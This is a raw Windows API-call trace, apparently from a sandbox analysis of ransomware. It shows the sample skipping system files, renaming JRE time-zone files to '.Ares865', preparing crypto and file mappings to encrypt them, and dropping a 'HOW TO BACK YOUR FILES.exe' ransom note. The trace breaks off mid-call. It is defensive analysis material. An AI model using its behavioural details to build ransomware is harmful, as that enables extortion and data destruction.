[0133.108] lstrcpyW (in: lpString1=0x2cce450, lpString2="ZoneInfoMappings" | out: lpString1="ZoneInfoMappings") returned="ZoneInfoMappings" [0133.108] lstrlenW (lpString="ZoneInfoMappings") returned 16 [0133.108] lstrlenW (lpString="Ares865") returned 7 [0133.108] lstrcmpiW (lpString1="appings", lpString2="Ares865") returned -1 [0133.108] lstrlenW (lpString=".dll") returned 4 [0133.108] lstrcmpiW (lpString1="ZoneInfoMappings", lpString2=".dll") returned 1 [0133.108] lstrlenW (lpString=".lnk") returned 4 [0133.108] lstrcmpiW (lpString1="ZoneInfoMappings", lpString2=".lnk") returned 1 [0133.108] lstrlenW (lpString=".ini") returned 4 [0133.108] lstrcmpiW (lpString1="ZoneInfoMappings", lpString2=".ini") returned 1 [0133.108] lstrlenW (lpString=".sys") returned 4 [0133.108] lstrcmpiW (lpString1="ZoneInfoMappings", lpString2=".sys") returned 1 [0133.108] lstrlenW (lpString="ZoneInfoMappings") returned 16 [0133.108] lstrlenW (lpString="bak") returned 3 [0133.108] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\ZoneInfoMappings.Ares865") returned 64 [0133.108] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\ZoneInfoMappings" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\zoneinfomappings"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\ZoneInfoMappings.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\zoneinfomappings.ares865"), dwFlags=0x1) returned 1 [0133.110] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\ZoneInfoMappings.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\zoneinfomappings.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.110] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14736) returned 1 [0133.110] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.111] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.111] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.111] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3c90, lpName=0x0) returned 0x170 [0133.112] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3c90) returned 0x190000 [0133.114] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.114] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.114] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.115] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV" [0133.116] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV" [0133.116] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0133.116] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\how to back your files.exe"), bFailIfExists=1) returned 0 [0133.116] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0133.117] GetLastError () returned 0x0 [0133.117] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0133.117] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x746ac100, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x529bd240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x529bd240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0133.117] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0133.117] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0133.117] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0133.117] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x746ac100, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x529bd240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x529bd240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0133.118] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0133.118] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0133.118] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0133.118] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0133.118] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x746ac100, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x746ac100, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x746ac100, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x1b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AST4", cAlternateFileName="")) returned 1 [0133.118] lstrcmpiW (lpString1="AST4", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0133.118] lstrcmpiW (lpString1="AST4", lpString2="aoldtz.exe") returned 1 [0133.118] lstrcmpiW (lpString1="AST4", lpString2=".") returned 1 [0133.118] lstrcmpiW (lpString1="AST4", lpString2="..") returned 1 [0133.118] lstrcmpiW (lpString1="AST4", lpString2="windows") returned -1 [0133.118] lstrcmpiW (lpString1="AST4", lpString2="bootmgr") returned -1 [0133.118] lstrcmpiW (lpString1="AST4", lpString2="temp") returned -1 [0133.118] lstrcmpiW (lpString1="AST4", lpString2="pagefile.sys") returned -1 [0133.118] lstrcmpiW (lpString1="AST4", lpString2="boot") returned -1 [0133.118] lstrcmpiW (lpString1="AST4", lpString2="ids.txt") returned -1 [0133.118] lstrcmpiW (lpString1="AST4", lpString2="ntuser.dat") returned -1 [0133.118] lstrcmpiW (lpString1="AST4", lpString2="perflogs") returned -1 [0133.118] lstrcmpiW (lpString1="AST4", lpString2="MSBuild") returned -1 [0133.118] lstrlenW (lpString="AST4") returned 4 [0133.118] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\*") returned 49 [0133.118] lstrcpyW (in: lpString1=0x2cce460, lpString2="AST4" | out: lpString1="AST4") returned="AST4" [0133.118] lstrlenW (lpString="AST4") returned 4 [0133.118] lstrlenW (lpString="Ares865") returned 7 [0133.118] lstrlenW (lpString=".dll") returned 4 [0133.118] lstrlenW (lpString=".lnk") returned 4 [0133.118] lstrlenW (lpString=".ini") returned 4 [0133.118] lstrlenW (lpString=".sys") returned 4 [0133.118] lstrlenW (lpString="AST4") returned 4 [0133.118] lstrlenW (lpString="bak") returned 3 [0133.119] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\AST4.Ares865") returned 60 [0133.119] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\AST4" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\ast4"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\AST4.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\ast4.ares865"), dwFlags=0x1) returned 1 [0133.120] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\AST4.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\ast4.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.120] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0133.120] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.121] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.121] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.121] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x170 [0133.126] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0x190000 [0133.126] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.127] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.127] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.128] lstrcpyW (in: lpString1=0x2cce460, lpString2="AST4ADT" | out: lpString1="AST4ADT") returned="AST4ADT" [0133.128] lstrlenW (lpString="AST4ADT") returned 7 [0133.128] lstrlenW (lpString="Ares865") returned 7 [0133.128] lstrlenW (lpString=".dll") returned 4 [0133.128] lstrcmpiW (lpString1="AST4ADT", lpString2=".dll") returned 1 [0133.128] lstrlenW (lpString=".lnk") returned 4 [0133.128] lstrcmpiW (lpString1="AST4ADT", lpString2=".lnk") returned 1 [0133.128] lstrlenW (lpString=".ini") returned 4 [0133.128] lstrcmpiW (lpString1="AST4ADT", lpString2=".ini") returned 1 [0133.128] lstrlenW (lpString=".sys") returned 4 [0133.128] lstrcmpiW (lpString1="AST4ADT", lpString2=".sys") returned 1 [0133.128] lstrlenW (lpString="AST4ADT") returned 7 [0133.128] lstrlenW (lpString="bak") returned 3 [0133.128] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\AST4ADT.Ares865") returned 63 [0133.128] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\AST4ADT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\ast4adt"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\AST4ADT.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\ast4adt.ares865"), dwFlags=0x1) returned 1 [0133.130] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\AST4ADT.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\ast4adt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.130] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2288) returned 1 [0133.130] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.131] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.131] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.131] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xbf0, lpName=0x0) returned 0x170 [0133.133] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbf0) returned 0x190000 [0133.133] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.134] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.134] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.135] lstrcpyW (in: lpString1=0x2cce460, lpString2="CST6" | out: lpString1="CST6") returned="CST6" [0133.135] lstrlenW (lpString="CST6") returned 4 [0133.135] lstrlenW (lpString="Ares865") returned 7 [0133.135] lstrlenW (lpString=".dll") returned 4 [0133.135] lstrlenW (lpString=".lnk") returned 4 [0133.135] lstrlenW (lpString=".ini") returned 4 [0133.135] lstrlenW (lpString=".sys") returned 4 [0133.135] lstrlenW (lpString="CST6") returned 4 [0133.135] lstrlenW (lpString="bak") returned 3 [0133.135] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\CST6.Ares865") returned 60 [0133.135] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\CST6" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\cst6"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\CST6.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\cst6.ares865"), dwFlags=0x1) returned 1 [0133.136] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\CST6.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\cst6.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.136] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0133.137] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.137] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.137] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.138] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x170 [0133.139] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0x190000 [0133.140] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.141] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.141] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.141] lstrcpyW (in: lpString1=0x2cce460, lpString2="CST6CDT" | out: lpString1="CST6CDT") returned="CST6CDT" [0133.141] lstrlenW (lpString="CST6CDT") returned 7 [0133.141] lstrlenW (lpString="Ares865") returned 7 [0133.141] lstrlenW (lpString=".dll") returned 4 [0133.141] lstrcmpiW (lpString1="CST6CDT", lpString2=".dll") returned 1 [0133.141] lstrlenW (lpString=".lnk") returned 4 [0133.142] lstrcmpiW (lpString1="CST6CDT", lpString2=".lnk") returned 1 [0133.142] lstrlenW (lpString=".ini") returned 4 [0133.142] lstrcmpiW (lpString1="CST6CDT", lpString2=".ini") returned 1 [0133.142] lstrlenW (lpString=".sys") returned 4 [0133.142] lstrcmpiW (lpString1="CST6CDT", lpString2=".sys") returned 1 [0133.142] lstrlenW (lpString="CST6CDT") returned 7 [0133.142] lstrlenW (lpString="bak") returned 3 [0133.142] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\CST6CDT.Ares865") returned 63 [0133.142] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\CST6CDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\cst6cdt"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\CST6CDT.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\cst6cdt.ares865"), dwFlags=0x1) returned 1 [0133.143] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\CST6CDT.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\cst6cdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.143] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2288) returned 1 [0133.144] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.144] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.144] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.145] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xbf0, lpName=0x0) returned 0x170 [0133.146] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbf0) returned 0x190000 [0133.147] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.147] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.147] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.148] lstrcpyW (in: lpString1=0x2cce460, lpString2="EST5" | out: lpString1="EST5") returned="EST5" [0133.148] lstrlenW (lpString="EST5") returned 4 [0133.148] lstrlenW (lpString="Ares865") returned 7 [0133.148] lstrlenW (lpString=".dll") returned 4 [0133.148] lstrlenW (lpString=".lnk") returned 4 [0133.148] lstrlenW (lpString=".ini") returned 4 [0133.148] lstrlenW (lpString=".sys") returned 4 [0133.148] lstrlenW (lpString="EST5") returned 4 [0133.148] lstrlenW (lpString="bak") returned 3 [0133.148] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\EST5.Ares865") returned 60 [0133.148] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\EST5" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\est5"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\EST5.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\est5.ares865"), dwFlags=0x1) returned 1 [0133.150] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\EST5.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\est5.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.150] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0133.151] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.151] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.151] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.152] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x170 [0133.154] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0x190000 [0133.154] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.155] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.155] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.156] lstrcpyW (in: lpString1=0x2cce460, lpString2="EST5EDT" | out: lpString1="EST5EDT") returned="EST5EDT" [0133.156] lstrlenW (lpString="EST5EDT") returned 7 [0133.156] lstrlenW (lpString="Ares865") returned 7 [0133.156] lstrlenW (lpString=".dll") returned 4 [0133.156] lstrcmpiW (lpString1="EST5EDT", lpString2=".dll") returned 1 [0133.156] lstrlenW (lpString=".lnk") returned 4 [0133.156] lstrcmpiW (lpString1="EST5EDT", lpString2=".lnk") returned 1 [0133.156] lstrlenW (lpString=".ini") returned 4 [0133.156] lstrcmpiW (lpString1="EST5EDT", lpString2=".ini") returned 1 [0133.156] lstrlenW (lpString=".sys") returned 4 [0133.156] lstrcmpiW (lpString1="EST5EDT", lpString2=".sys") returned 1 [0133.156] lstrlenW (lpString="EST5EDT") returned 7 [0133.156] lstrlenW (lpString="bak") returned 3 [0133.156] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\EST5EDT.Ares865") returned 63 [0133.156] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\EST5EDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\est5edt"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\EST5EDT.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\est5edt.ares865"), dwFlags=0x1) returned 1 [0133.158] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\EST5EDT.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\est5edt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.158] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2288) returned 1 [0133.158] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.159] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.159] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.159] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xbf0, lpName=0x0) returned 0x170 [0133.160] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbf0) returned 0x190000 [0133.161] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.162] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.162] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.162] lstrcpyW (in: lpString1=0x2cce460, lpString2="HST10" | out: lpString1="HST10") returned="HST10" [0133.162] lstrlenW (lpString="HST10") returned 5 [0133.162] lstrlenW (lpString="Ares865") returned 7 [0133.162] lstrlenW (lpString=".dll") returned 4 [0133.162] lstrcmpiW (lpString1="HST10", lpString2=".dll") returned 1 [0133.162] lstrlenW (lpString=".lnk") returned 4 [0133.162] lstrcmpiW (lpString1="HST10", lpString2=".lnk") returned 1 [0133.162] lstrlenW (lpString=".ini") returned 4 [0133.162] lstrcmpiW (lpString1="HST10", lpString2=".ini") returned 1 [0133.163] lstrlenW (lpString=".sys") returned 4 [0133.163] lstrcmpiW (lpString1="HST10", lpString2=".sys") returned 1 [0133.163] lstrlenW (lpString="HST10") returned 5 [0133.163] lstrlenW (lpString="bak") returned 3 [0133.163] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\HST10.Ares865") returned 61 [0133.163] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\HST10" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\hst10"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\HST10.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\hst10.ares865"), dwFlags=0x1) returned 1 [0133.164] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\HST10.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\hst10.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.164] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 